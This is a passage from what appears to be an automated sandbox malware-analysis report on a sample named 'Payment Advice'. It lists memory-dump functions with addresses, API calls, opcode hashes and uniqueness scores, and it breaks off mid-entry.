                                                                                      • Snapshot File: hcaresult_0_2_5c80000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 7Z/t$RWIK$[[bb
                                                                                      • API String ID: 0-1157992699
                                                                                      • Opcode ID: e775accc79bdf92adeaffc930dc686d8e3991d0dfc4f1e8b384e0cff28cbf339
                                                                                      • Instruction ID: 17af9c088c330b5f3a17d4ca5d5db1ca22967b86bffc4d8b7960f54b17e80681
                                                                                      • Opcode Fuzzy Hash: e775accc79bdf92adeaffc930dc686d8e3991d0dfc4f1e8b384e0cff28cbf339
                                                                                      • Instruction Fuzzy Hash: 6C51F470E0520ACFCB48CFAAC5416AEFFF6BB88310F14D86AD429B7254D7749A418F94
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 077A0EF0 Relevance: 1.6, Strings: 1, Instructions: 302COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1719882744.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_77a0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: tIh
                                                                                      • API String ID: 0-443931868
                                                                                      • Opcode ID: 9825e63b0842fcc3d50fe4367f4552b320d33519fc7b6c88f967278d5e268b80
                                                                                      • Instruction ID: c381b1715f7c6064fed7a26c4e1a82f908e7aaff5dbf409d7b1528e9a904eac4
                                                                                      • Opcode Fuzzy Hash: 9825e63b0842fcc3d50fe4367f4552b320d33519fc7b6c88f967278d5e268b80
                                                                                      • Instruction Fuzzy Hash: C9D137B4E1524AEFEB04CF99C4848AEFBB2FF89340F10D655E411AB215D734AA42CF95
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 077A43A0 Relevance: .2, Instructions: 231COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1719882744.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_77a0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 110079bd336ca008cdb8f6da3a10fb66c5831f4d66d1b21a4c2b6e4ce4c6521f
                                                                                      • Instruction ID: 25e4dc5b70dc30c61560f7c3858cd3483ca24c4374566adf3dea1f7c536f284e
                                                                                      • Opcode Fuzzy Hash: 110079bd336ca008cdb8f6da3a10fb66c5831f4d66d1b21a4c2b6e4ce4c6521f
                                                                                      • Instruction Fuzzy Hash: 299148B0D15248EFDB08CFE9E58499DFBB2FB8A344F20A51AE416BB224D7719905CF14
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 077A4088 Relevance: .2, Instructions: 204COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1719882744.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_77a0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b20ceeec76f980d244f7b357eb296d039cf34163db060dc733d83c84dfea5881
                                                                                      • Instruction ID: d2a5771d7c9086b81f64faa580fe07695ebcbf55670acfb1ee712df1074dd501
                                                                                      • Opcode Fuzzy Hash: b20ceeec76f980d244f7b357eb296d039cf34163db060dc733d83c84dfea5881
                                                                                      • Instruction Fuzzy Hash: 318133B4E10229DFDB04CFA9C8819EEFBB1FB89340F209A6AD411B7214D7759912CF58
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 077A0007 Relevance: .1, Instructions: 80COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1719882744.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_77a0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 51ea8e2f5953a4b79d5983aea4f944494326be182932526b85a2afbcbb2e3c56
                                                                                      • Instruction ID: 79aa8ad62ca6cbb2c96e116f4292a584bb1e5d34948ed85eaf58437d913c35c9
                                                                                      • Opcode Fuzzy Hash: 51ea8e2f5953a4b79d5983aea4f944494326be182932526b85a2afbcbb2e3c56
                                                                                      • Instruction Fuzzy Hash: 443161B1D057448FE719CF6A88542DEBFF3AFC9300F18C5AAD448AB265DB340945CB51
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 077A0040 Relevance: .1, Instructions: 66COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1719882744.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_77a0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b69b06b005774275d6b735ff69f6fb786acda55351a7e89babe2f0192bcac8fe
                                                                                      • Instruction ID: 42ae7f6c4a721b56c26ef96a0450402901f7304d4833fd026874b0d88fc65d7d
                                                                                      • Opcode Fuzzy Hash: b69b06b005774275d6b735ff69f6fb786acda55351a7e89babe2f0192bcac8fe
                                                                                      • Instruction Fuzzy Hash: 3D21F8B1E006189BEB18CFABD8442DEFBF3AFC8310F14C17AD409A6258EB701A55CA50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 077A5780 Relevance: 2.6, Strings: 2, Instructions: 85COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1719882744.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_77a0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 8bq$8bq
                                                                                      • API String ID: 0-1276831224
                                                                                      • Opcode ID: 747546f8d3525546a3dcf35b7b2a787d24709c6290f8b780e4bae79da0c0a24c
                                                                                      • Instruction ID: 5a546059714025f629f41ab49e3ce5571e5274c0ae2ac7398c0d2e8ae7838aad
                                                                                      • Opcode Fuzzy Hash: 747546f8d3525546a3dcf35b7b2a787d24709c6290f8b780e4bae79da0c0a24c
                                                                                      • Instruction Fuzzy Hash: 5B21B1B0B40109AFD700AB68D440A7E7BE2EBC9354F54457AE605EB295EA30CD418B91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 077A1530 Relevance: 2.6, Strings: 2, Instructions: 63COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1719882744.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_77a0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 3H5$3H5
                                                                                      • API String ID: 0-2752242361
                                                                                      • Opcode ID: 0425968c2e94ca17a5fb1c179a48aeb14d1d70d3f84609190d9ed0823b607f3d
                                                                                      • Instruction ID: 1e3cb9379045a62ec2e68e0960cf539e9d99db4d1aba518c38587e9b95a643c7
                                                                                      • Opcode Fuzzy Hash: 0425968c2e94ca17a5fb1c179a48aeb14d1d70d3f84609190d9ed0823b607f3d
                                                                                      • Instruction Fuzzy Hash: D82116B0E11209EFEB44CFA9C5409AEFBF1FF89340F54C6AAD509A7214E7309A45CB81
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0556DA11 Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • DrawTextExW.USER32(?,?,?,?,?,?), ref: 0556DAAF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1716983148.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_5560000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID: DrawText
                                                                                      • String ID:
                                                                                      • API String ID: 2175133113-0
                                                                                      • Opcode ID: 2d202ce273c602059e57ce1e506c2841dbd3281d54185d743562bee2f5b271f7
                                                                                      • Instruction ID: 3c5cacc3b90223fc0c6c4c33856084250a6e02d8192e18600899ee4406efbd86
                                                                                      • Opcode Fuzzy Hash: 2d202ce273c602059e57ce1e506c2841dbd3281d54185d743562bee2f5b271f7
                                                                                      • Instruction Fuzzy Hash: 4831C5B59042499FDB10CF99D884AEEFBF5FB48310F14842AE815A7710D775A944CFA4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0556DA18 Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • DrawTextExW.USER32(?,?,?,?,?,?), ref: 0556DAAF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1716983148.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_5560000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID: DrawText
                                                                                      • String ID:
                                                                                      • API String ID: 2175133113-0
                                                                                      • Opcode ID: e38e1a54d5cbbd1103ddcbb9ccbcc9b0f8e2cd6ba27cb477afe5006140e11ec2
                                                                                      • Instruction ID: 31419bfd01cba783da3038960f3f805e1cb8fbb541e5eb60ecaa2aea6e5eb4df
                                                                                      • Opcode Fuzzy Hash: e38e1a54d5cbbd1103ddcbb9ccbcc9b0f8e2cd6ba27cb477afe5006140e11ec2
                                                                                      • Instruction Fuzzy Hash: 1A21D2B5D042499FDB10CF9AD884ADEFBF5FB48320F18842AE819A7310D775A944CFA4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0149CEA8 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0149DDC1,00000800,00000000,00000000), ref: 0149DFB2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1707985266.0000000001490000.00000040.00000800.00020000.00000000.sdmp, Offset: 01490000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_1490000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID: LibraryLoad
                                                                                      • String ID:
                                                                                      • API String ID: 1029625771-0
                                                                                      • Opcode ID: 7cff2094f1404a3d01300b1fba9273313272b5e6919e728fc16a9bd6ac827b00
                                                                                      • Instruction ID: ced51468f3b5953f1f5f03322ff8934ffb73e25c4d9295524798f244eec0020e
                                                                                      • Opcode Fuzzy Hash: 7cff2094f1404a3d01300b1fba9273313272b5e6919e728fc16a9bd6ac827b00
                                                                                      • Instruction Fuzzy Hash: 701100B6D042498FDB10CF9AC445ADEFFF4EB88314F10842AE519A7254C379A545CFA4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0149DCE0 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 0149DD46
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1707985266.0000000001490000.00000040.00000800.00020000.00000000.sdmp, Offset: 01490000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_1490000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID: HandleModule
                                                                                      • String ID:
                                                                                      • API String ID: 4139908857-0
                                                                                      • Opcode ID: 9d4dd487c1a36b0b461a2678e9c1dd628dc86651c0b4e11f9f1ceccdfdd66d2e
                                                                                      • Instruction ID: aedb4ba1696025b9ab58a74a8278046d2950b1ebb967cfc788cfa098e572921c
                                                                                      • Opcode Fuzzy Hash: 9d4dd487c1a36b0b461a2678e9c1dd628dc86651c0b4e11f9f1ceccdfdd66d2e
                                                                                      • Instruction Fuzzy Hash: C41110B5C002498FDB10CF9AC444ADEFFF4AF88320F10852AD559B7220C379A545CFA5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 077A36D0 Relevance: 1.3, Strings: 1, Instructions: 97COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1719882744.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_77a0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: O};5
                                                                                      • API String ID: 0-3558557551
                                                                                      • Opcode ID: 826ef7ab3d9ab80acc26ecd96570c0502f1ad517f2de730c01d2b03d004b57ae
                                                                                      • Instruction ID: 0c779c771916266f1c77dc2512b4c2f083acebdd591a19f2587b01c51f0d0e10
                                                                                      • Opcode Fuzzy Hash: 826ef7ab3d9ab80acc26ecd96570c0502f1ad517f2de730c01d2b03d004b57ae
                                                                                      • Instruction Fuzzy Hash: 29417CB0A20609EFDB44CF95D5898AEBFF1FB8A200F60D8A5D455EB328D730DA11CB14
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 077AB271 Relevance: 1.3, Strings: 1, Instructions: 97COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1719882744.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_77a0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Te^q
                                                                                      • API String ID: 0-671973202
                                                                                      • Opcode ID: 765d38a10f315628eeb2c53e4753db5948c65b50c12aeffbb9e1e4b42ddecc01
                                                                                      • Instruction ID: 1c7e47c05ee75f7935108314753076be2d540fbb70771bee1ce5bcb7c40540ca
                                                                                      • Opcode Fuzzy Hash: 765d38a10f315628eeb2c53e4753db5948c65b50c12aeffbb9e1e4b42ddecc01
                                                                                      • Instruction Fuzzy Hash: 993118B4E042489FDB08CFA6C9546EEBBF6BF8A341F10912AD419AB368DB345905CF50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 077AB280 Relevance: 1.3, Strings: 1, Instructions: 90COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1719882744.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_77a0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Te^q
                                                                                      • API String ID: 0-671973202
                                                                                      • Opcode ID: 4bb3b761256b904d9c483a055abd4ee6e8c01f826627cce89a69dfce8ff11c08
                                                                                      • Instruction ID: c1729a51ca8a0d85ed8df306cff56b4035c592026792e19e66b266d83f148f32
                                                                                      • Opcode Fuzzy Hash: 4bb3b761256b904d9c483a055abd4ee6e8c01f826627cce89a69dfce8ff11c08
                                                                                      • Instruction Fuzzy Hash: 0831E8B4E142089BDB08DFA6C9446EEBBF6FF8A340F109129D419AB368DB7459058F50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 077A1520 Relevance: 1.3, Strings: 1, Instructions: 65COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1719882744.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_77a0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 3H5
                                                                                      • API String ID: 0-3899204960
                                                                                      • Opcode ID: bd0c0c3aff562790f39337430cfbaf1db563b7631908544632b633c4b7de4c0b
                                                                                      • Instruction ID: ee5ba1f5d65f81e9e94fc4e850b540750b72e6dd741f21af253b452776920d56
                                                                                      • Opcode Fuzzy Hash: bd0c0c3aff562790f39337430cfbaf1db563b7631908544632b633c4b7de4c0b
                                                                                      • Instruction Fuzzy Hash: 73213BB0E1120ADFEB44CFA9D5805AEFBF1FF89340F14C5A6D505A7254E7309A44CB81
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 077A3A5C Relevance: 1.3, Strings: 1, Instructions: 62COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1719882744.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_77a0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Te^q
                                                                                      • API String ID: 0-671973202
                                                                                      • Opcode ID: b0787e4f424a0fc3126db6d4097fac3e0d5d63dc02135e159153098b46ac8ceb
                                                                                      • Instruction ID: 75b6b3b8b14d1b5c9e854e5a6bd29c07179e12e9715226797041ac779ac896ed
                                                                                      • Opcode Fuzzy Hash: b0787e4f424a0fc3126db6d4097fac3e0d5d63dc02135e159153098b46ac8ceb
                                                                                      • Instruction Fuzzy Hash: 2B116D71B0020A9BDB04EBB999505FEB7F6AFD4250F10453AD545EB244EF318E16CBA2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 077AB3DF Relevance: 1.3, Strings: 1, Instructions: 44COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1719882744.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_77a0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Te^q
                                                                                      • API String ID: 0-671973202
                                                                                      • Opcode ID: 3d0575c5477ac4fbb4853bbebe8055b78648dd2020887775f4ce807021a0d736
                                                                                      • Instruction ID: 72babd584bcc26410aaa691fb0b154dc3f8d8ba11a59e34e5710f872c6df48bc
                                                                                      • Opcode Fuzzy Hash: 3d0575c5477ac4fbb4853bbebe8055b78648dd2020887775f4ce807021a0d736
                                                                                      • Instruction Fuzzy Hash: FE114F75E002198FCF08DFE8C8849ADBBB2FB88314F20852AE919AB355D731A955DF50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 077AE8CB Relevance: 1.3, Strings: 1, Instructions: 18COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1719882744.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_77a0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: .e
                                                                                      • API String ID: 0-2449113350
                                                                                      • Opcode ID: 2159b3f62a5c9f6ee0ac310bf500367ae4d4287ed2f0c1bceabba32a37f3043a
                                                                                      • Instruction ID: 787f2a42ae4f1a11436a2b4a1d32d337d26d40c392ecb9acca6accb74ce3858a
                                                                                      • Opcode Fuzzy Hash: 2159b3f62a5c9f6ee0ac310bf500367ae4d4287ed2f0c1bceabba32a37f3043a
                                                                                      • Instruction Fuzzy Hash: B4E012F49022149FCF44DF64E68555CBB75FB85244B10822994099B754DB308812CF51
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 077ABA50 Relevance: .1, Instructions: 109COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1719882744.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_77a0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: cd1f16a0753592524b2476c0c3b2d5ca2c4f6e909b8de49d93dde5ff3b6e9eca
                                                                                      • Instruction ID: 9ddb9a713c323b78b5116c01138ec9ee666919f206d11b15ec372825933897e5
                                                                                      • Opcode Fuzzy Hash: cd1f16a0753592524b2476c0c3b2d5ca2c4f6e909b8de49d93dde5ff3b6e9eca
                                                                                      • Instruction Fuzzy Hash: F5314CF4D19209DBEB08CF9AD4046BEBBF6EBCE341F14E169E419A3261D73059418B54
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 077A8A68 Relevance: .1, Instructions: 108COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1719882744.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_77a0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 483ff1e5da07dcca47d6c00808d2bd0435d7d8550f1e34ae110458b7b4ecd3da
                                                                                      • Instruction ID: 2d7ea1460ecded1ecfcf67008e7719548d089a0d4e68d5fb23fc30bf7d9afb19
                                                                                      • Opcode Fuzzy Hash: 483ff1e5da07dcca47d6c00808d2bd0435d7d8550f1e34ae110458b7b4ecd3da
                                                                                      • Instruction Fuzzy Hash: 2241D6B1A19216EFE302DB69CC44B7A7BE1EB86344F4586B6F515DB291C334DC40CB52
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 077A3858 Relevance: .1, Instructions: 106COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1719882744.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_77a0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a7f0162afb0ffdfad4ca20defb8f659bd87c61f606857f1e9f4b0611a6c1b518
                                                                                      • Instruction ID: 5ba7457fdb64ec873185b0bc4d20338b7cd17a72885d1ec04293b7d60dbe9aa6
                                                                                      • Opcode Fuzzy Hash: a7f0162afb0ffdfad4ca20defb8f659bd87c61f606857f1e9f4b0611a6c1b518
                                                                                      • Instruction Fuzzy Hash: E5417CB4E1420AEFDB04CFA5D8459EEBBB2FF89310F109529E505AB354D7709A41CFA0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 077ACB68 Relevance: .1, Instructions: 104COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1719882744.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_77a0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 5aaa797f332e8c044fc2991425f34aac7b27829fc6c8f86775a80538054f7d57
                                                                                      • Instruction ID: 26c5e52b6bd6a714357ef5b3b68bba40926d7b78d48542f9a62987e7f18b6bf9
                                                                                      • Opcode Fuzzy Hash: 5aaa797f332e8c044fc2991425f34aac7b27829fc6c8f86775a80538054f7d57
                                                                                      • Instruction Fuzzy Hash: 6E411BB0919209EFDB05CFA9C5445EDBBFAFB8E341F14A255E409A7212D7349981CF60
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 077A3568 Relevance: .1, Instructions: 95COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1719882744.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_77a0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: acf89cb711a985fa36f683724d8f979ee5e6f4b4f3d7ecef63cdbf82a71414b5
                                                                                      • Instruction ID: 29901feaff155d0dcb70f045b4f510cb588ca58cac6d3d594ec68e2bbe09587d
                                                                                      • Opcode Fuzzy Hash: acf89cb711a985fa36f683724d8f979ee5e6f4b4f3d7ecef63cdbf82a71414b5
                                                                                      • Instruction Fuzzy Hash: DF31ADB89097C48FD306CB699450948BFB0EF8A201F0A85D6C480CF3B3C634984AC723
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 077A7440 Relevance: .1, Instructions: 94COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1719882744.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_77a0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 77426f31538e5903b3df8b288e2583b2455c591c6a32af42b683fdf32161cba6
                                                                                      • Instruction ID: 9c8f3cd39df502ab4a450f05f2a5d8691b78ae249c865357df74bfb3e58db0f6
                                                                                      • Opcode Fuzzy Hash: 77426f31538e5903b3df8b288e2583b2455c591c6a32af42b683fdf32161cba6
                                                                                      • Instruction Fuzzy Hash: 283156B6A00249EFDF14DFA9D844ADEBFF5EB49320F14846AE409E7211D734A940CFA0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 077ACBF1 Relevance: .1, Instructions: 91COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1719882744.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_77a0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 7ea579afd140931be07440e33c8c462e0d389c29c0dc3693bd185ea7092a7c98
                                                                                      • Instruction ID: 42033074f910750a0fbcce5cd1ca64d5d9adf72a505a1f638fb2f14b5f96fc98
                                                                                      • Opcode Fuzzy Hash: 7ea579afd140931be07440e33c8c462e0d389c29c0dc3693bd185ea7092a7c98
                                                                                      • Instruction Fuzzy Hash: 28315AB4914219EFEB05CF99C4445ADBBB6BF8E341F14D655D409AB201D734A981CF60
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 077AE4BF Relevance: .1, Instructions: 88COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1719882744.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_77a0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: cecdabba0137576035c30ab7446be58f7d5df441cf7be5c41fef4f24ff05e7ff
                                                                                      • Instruction ID: 9ea027fdba237ed3716b70d521cbdd52e955577f1d95691d3ce28cd1dbfca69b
                                                                                      • Opcode Fuzzy Hash: cecdabba0137576035c30ab7446be58f7d5df441cf7be5c41fef4f24ff05e7ff
                                                                                      • Instruction Fuzzy Hash: 4D31F8B0915209DFEB44DF68E88AAAD7FF5FB46350F054565F40197251DBB09544CF01
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 077AE63E Relevance: .1, Instructions: 87COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1719882744.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
